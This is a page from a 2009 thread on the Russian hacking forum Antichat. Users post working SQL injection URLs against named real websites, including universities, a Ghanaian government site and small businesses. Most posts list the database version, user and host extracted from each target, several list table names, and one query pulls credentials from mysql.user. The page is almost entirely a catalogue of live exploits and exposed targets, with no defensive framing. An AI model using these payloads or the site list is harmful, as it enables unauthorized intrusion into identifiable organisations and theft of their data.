ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9861  
Старый 13.06.2009, 13:52
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.avtoway.ru/news.html?item_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,versi on(),15,16,17,18,19,20,21,22,23+from+information_s chema.tables+--+
5.1.26-rc

http://www.off-road-market.ru/item_view.php?id=&item_id=-2492+union+select+1,2,3,4,5,6,7,8,9,10,11,12,versi on(),14,15,16,17,18+--+
5.1.26-rc

http://www.zababahai.ru/page/news-read.php?news=-12+UnIoN+SeLecT+1,concat_ws(0x3a3a,USER_ID,EMAIL,L EVEL_ID,PASS),3,4,5,6+from+site_user+/*+

http://www.vniikp.ru/info_page.phtml?item_id=-2108+union+select+concat_ws(0x3a3a,login,password) ,2,3,4,5,6+from+admins+--+

Последний раз редактировалось DezMond™; 13.06.2009 в 14:06..
 
Ответить с цитированием

  #9862  
Старый 13.06.2009, 13:56
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.ihd.umkc.edu/read_more.php?id=-136'+union+select+1,2,concat_ws(0x3a,user(),databa se(),version())/*

moddrc@localhost:moddrc:5.0.45

http://www.ihd.umkc.edu/read_more.php?id=-136'+union+select+1,2,group_concat(table_name)+fro m+information_schema.tables+group+by+table_schema+ limit+1,1/*

Цитата:
Support_Group,cms_admin_users,cms_article_rev,cms_ keyword,Fast_Facts,link_report,ms_messages,online_ resources,contact,LibraryCatalog,Video,cms_article ,cms_calendar_data,cms_keyword_category,disibility packets,ms_batch,ms_sent_to,practices_new,Perspect ives,Web,cms_article_category,cms_cat_art_conn,eve nts,ms_link,ms_test_group,sg_dis_link,cms_picture_ storage,Practices,availability,cms_article_hist,cm s_cite,form_submissions,ms_link_log,notes,supportg roup,cms_relevence
##########################################

PR6

http://www.cse.edu/index.php?id=32&no_cache=1&rtype=2&ruid=-36+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14

5.0.67-0ubuntu6:t3_cse:typo3@web1.cse.edu

http://www.cse.edu/index.php?id=32&no_cache=1&rtype=2&ruid=-36+union+select+1,2,3,4,5,group_concat(table_name) ,7,8,9,10,11,12,13,14+from+information_schema.tabl es+group+by+table_schema+limit+1,x

x= {1,2,3...}
tables:

Цитата:
static_tsconfig_help,tt_news_related_mm,sys_histor y,tx_alumdir_alumni,sys_note,tx_chcforum_forumgrou p,sys_workspace,tt_content,tx_cseteamsched_sports, fe_session_data,tx_impexp_presets,pages_language_o verlay,tx_chcforum_thread,tx_rtehtmlarea_acronym,t x_collegedir_service,be_users,tx_volopp_requestor_ volunteer_opportunities_mm,
Цитата:
tt_news,sys_be_shortcuts,tx_admrqst_inforeq,sys_la nguage,tx_chcforum_category,sys_preview,tx_chcforu m_mail_log,tt_address,static_languages,tx_cseteams ched_sports,fe_session_data,tx_impexp_presets,page s_language_overlay,tx_chcforum_thread,tx_rtehtmlar ea_acronym,tx_collegedir_service,be_users,tx_volop p_requestor_volunteer_opportunities_mm

Последний раз редактировалось HAXTA4OK; 13.06.2009 в 14:17..
 
Ответить с цитированием

  #9863  
Старый 13.06.2009, 14:50
Аватар для dr.Pilulkin
dr.Pilulkin
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827

Репутация: 48
По умолчанию

http://crll.gcal.ac.uk/staff_details.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a,user(),database(),version()),13,14,15--
crlladmin@localhost:crll:5.0.45-community-nt

http://business-school.exeter.ac.uk/module.php?id=-45+union+select+1,2,3,4,5,concat_ws(0x3a,user(),da tabase(),version()),7,8,9,10,11,12,13,14,15,16,17, 18,19--
sobeadm@snowwhite.ex.ac.uk:sobe:5.0.45-log
 
Ответить с цитированием

  #9864  
Старый 13.06.2009, 15:14
Аватар для udman
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

http://www.acornhousing.org
Цитата:
http://www.acornhousing.org/TEXT/offices.php?reg=5+UNION+SELECT+0,concat_Ws(0x0b,u ser(),version(),database()),2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24+LIMIT+7,1+--+&
php@localhost
5.0.24a
ahcws

PR: 6


http://www.ipa.ca
Цитата:
http://www.ipa.ca/regions/reg.php?reg=-1+UNION+SELECT+0,1,2,concat_ ws(0x0b,user(),version(),database()),4,5,6,7,8,9,1 0,11,12+--+
ipaca_princess@localhost
5.0.77-community
ipaca_member

PR: 4


http://bancodeimagenscmpa.procempa.com.br
Цитата:
http://bancodeimagenscmpa.procempa.com.br/visualiza.php?codImagem=-8239+UNION+SELECT+0,1,2,3,concat_ws(0x0b,u ser(),version(),database()),5,6,7,8,9,10,11,12,13, 14+--+
bdimgw@LPROWEB.procempa.com.br
4.0.24_Debian-10sarge1-log
bancoimagenscamarapoa

PR: 2


http://www.lafilmo.com
Цитата:
http://www.lafilmo.com/viaje/pagina.php?reg=-8+UNION+SELECT+concat_ws(0x2b,use r(),version(),database()),2,3,4,5,6,7,8
minisivac@localhost
4.1.22-log
minisivac

PR: 6


http://0382.com.ua
Цитата:
http://0382.com.ua/catalog.php?reg=&cat_1=-26'+UNION+SELECT+concat_Ws(0x0b,u ser(),version(),database())+--+
com0382_com0382@localhost
5.1.35-log
com0382_063

PR: 3


http://coe.ulstu.ru
Цитата:
http://coe.ulstu.ru/index.php?reg=main&action=show_new&id=-94+UNION+SELECT+0,concat_Ws(0x0b,user(),version(), dat abase()),2,3,4,5
coe_ulstu_ru@mercury.ulstu.ru
4.1.25-log
coe_ulstu_ru

PR: 3


http://www.amczn.creamax.su
Цитата:
http://www.amczn.creamax.su/reg_view.php?reg=-4+UNION+SELECT+1,concat_Ws(0x0b,user(),version(),d ataba se()),3,4+--+
creamax_amcznb01@fe61.hc.ru
4.1.22-log
wwwcreamaxsu_amcznbase

PR: 4


http://www.liogrand.ru
Цитата:
http://www.liogrand.ru/bron.php?reg=-6'+UNION+SELECT+0,concat_Ws(0x2b,us er(),version(),database()),2,3,4,5,6,7,8,9,10,11,1 2,13+--+&id=366
Uwww3969S@localhost
5.0.81-log
udb3969

PR: 4


http://www.simnet.ru
Цитата:
http://www.simnet.ru/index.php?reg=main&action=st_page&id_page=-20+UNION+SELECT+concat_ws(0x0b,use r(),version(),database()),1
siteadmin@localhost
5.0.45
muci

PR: 2


http://www.alabamaruralaction.com
Цитата:
http://www.alabamaruralaction.com/detail.php?reg=99&com=-99+UNION+SELECT+concat_Ws(0x0b,user(),databas e(),version())+--+
rroenig_arac@76.163.252.90
rroenig_arac
4.1.20-max-log

PR: 2
 
Ответить с цитированием

  #9865  
Старый 13.06.2009, 16:39
Аватар для SkyLine32
SkyLine32
Участник форума
Регистрация: 01.03.2009
Сообщений: 121
Провел на форуме:
4022236

Репутация: 38
Отправить сообщение для SkyLine32 с помощью ICQ Отправить сообщение для SkyLine32 с помощью AIM Отправить сообщение для SkyLine32 с помощью MSN Отправить сообщение для SkyLine32 с помощью Yahoo
По умолчанию

PR 3
Цитата:
http://www.wheelsandwheelsauto.com/carprofile.php?id=-609+union+select+concat_ws(version(),database(),us er()),2,3--
Database Version: 5.0.74sp1-enterprise-gpl-log
Database name: wheel015
User name: wheel015@216.239.136.38
****************
Нашёл интересную вещь...назвал я это самоDdos
Цитата:
http://www.sabou.net/myspace-comments.php?id=-
****************
Вот ещё
Цитата:
http://www.bmdw.org/typo3/sysext/
Стоит на движке typo3. Может кому будет интересно...
****************
Тут меня особо улыбнуло
Цитата:
http://www.jcgja.com/index.php?action=content&id=1'
Директории можно просматривать браузером.
****************
Цитата:
http://www.psdpjamaica.com/psdp/index.php?action=content&id=-271+union+select+concat_ws(version(),database(),us er()),2,3,4,5,6,7,8,9--
Database Version: 4.1.8-nt
Database name: psdp
User name: jampro2005@cwj-www12.cwjamaica.com
****************
Цитата:
http://www.serikandi.com/news.php?id=-121+union+select+concat_ws(version(),database(),us er()),2,3,4,5,6--
Database Version: 5.0.77-log
Database name: d60523336
User name: u70583365@cgihost
****************
Цитата:
http://www.fgbmfighana.org/news-events/details.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3,4,5,6,7,8,9--
Database Version: 4.1.22-log
Database name: 341213_fullgospelcms
User name: 341213_alfred@172.16.10.223
****************
Цитата:
http://www.royalbasinresort.com/page.php?id=-4+union+select+1,concat_ws(version(),database(),us er()),3--
Database Version: 4.1.22-standard-log
Database name: royalba_db
User name: royalba_user@74.50.85.223
****************
PR 3
Цитата:
http://www.ejobsghana.com/website/about/index.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3,4,5,6,7,8,9--
Database Version: 4.1.22-log
Database name: 342335_ejobscms
User name: 342335_alfred@172.16.10.220
****************
Цитата:
http://www.cic-ghana.com/cic-ghana/news.php?id=-18+union+select+1,concat_ws(version(),database(),u ser()),3,4,5,6--
Database Version: 5.0.67-community-log
Database name: cic_cicgh
User name: cic_naya@localhost
****************
PR 6
Цитата:
http://www.nab.gov.gh/nabsite/pages/press2.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3--
Database Version: 4.1.22-standard-log
Database name: nabgov_nab
User name: nabgov_nab@74.50.85.19
****************
PR 6
Школа исследований и аспирантуры, Университет Ганы
Цитата:
http://srgs.ug.edu.gh/annoucement.php?id=-14+union+select+concat_ws(version(),database(),use r()),2--
Database Version: 5.0.32-Debian_7etch6-log
Database name: srgs
User name: root@localhost
****************
Цитата:
http://www.pdaghana.com/page.php?id=-6+union+select+1,concat_ws(version(),database(),us er()),3--
Database Version: 4.1.22-standard-log
Database name: pdaghan_db
User name: pdaghan_user@216.219.95.52

Последний раз редактировалось SkyLine32; 13.06.2009 в 23:11..
 
Ответить с цитированием

  #9866  
Старый 13.06.2009, 23:53
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

[PR 6]
Код:
http://www.interspaziale.it/firme/articolo.php?id=-20223+union+select+1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7,8,9,10,11,12,13,14,15,16
4.1.10-log:internazionale:internazionale@10.10.0.11
====================
[PR 5]
Код:
http://www.photocross.ru/gallery/index.php?c=-72+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4
5.0.51a-community:db_photocross2hotocross2@a15.nthosting.ru
====================
[PR 4]
Код:
http://www.greatandhra.com/ganews/viewnews.php?id=-13116+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())--&scat=25
5.0.77-community:ga_news:venkat@174.120.39.50
Код:
http://www.greatandhra.com/ganews/viewnews.php?id=-13116+union+select+1,2,3,4,concat_ws(0x3a,user,password,file_priv)+from+mysql.user--&scat=25
====================
[PR 1]
Код:
http://www.newandusedpalletracking.co.uk/article.php?id=-54+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())
4.1.22:threejc:threejc@localhost

Последний раз редактировалось jokester; 14.06.2009 в 01:09.. Причина: Пароли и хеши запрещены
 
Ответить с цитированием

  #9867  
Старый 14.06.2009, 01:04
Аватар для TELO
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

Код:
http://dance.sebastopol.ua/showalbum.php?page_code=-9%20union%20select%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6%20%20--
4.0.27-max-log:geokon10:geokon10@v41.valuehost.ru
 
Ответить с цитированием

  #9868  
Старый 14.06.2009, 03:09
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.sarafalcsrl.com/arataimobil.php?id=-46+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38/*


Database Version: 5.0.45-community-nt
Database name: imobile
User name: soim@localhost
 
Ответить с цитированием

  #9869  
Старый 14.06.2009, 09:41
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.lemmingtrail.com/t.php?id=110319+and+substring(version(),1,1)=4
----
http://www.eevolute.com/t.php?pageid=1&atid=15&id=14+and+substring(version (),1,1)=5
----
http://map.planetmedalofhonor.gamespy.com/mohaa/t.php?id=82+and+substring(version(),1,1)=4
----
http://www.climatsv.ru/t.php?id=-10+union+select+concat_ws(0x3a,version(),user(),da tabase())
5.0.67-log:u50633@10.10.223.224:u50633
----
http://www.zinesters.net/board/t.php?id=66+and+substring(version(),1,1)=4/*

Последний раз редактировалось AlexSatter; 14.06.2009 в 09:44..
 
Ответить с цитированием

  #9870  
Старый 14.06.2009, 09:41
Аватар для rolex
rolex
Познающий
Регистрация: 07.04.2009
Сообщений: 40
Провел на форуме:
8945659

Репутация: 103
Отправить сообщение для rolex с помощью ICQ
По умолчанию

Цитата:
http://pravo.ruz.net/news/newskom.php3?newsid=-96+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5--
hardover_pravon:5.0.67-community:hardover_pravo@localhost

//--------------------------------------------//

Цитата:
http://www.bigfootinfo.org/articles/article.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user())--
bigfootinfo:5.0.67.d7-ourdelta-log:bigfootinfo@68.178.254.169
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ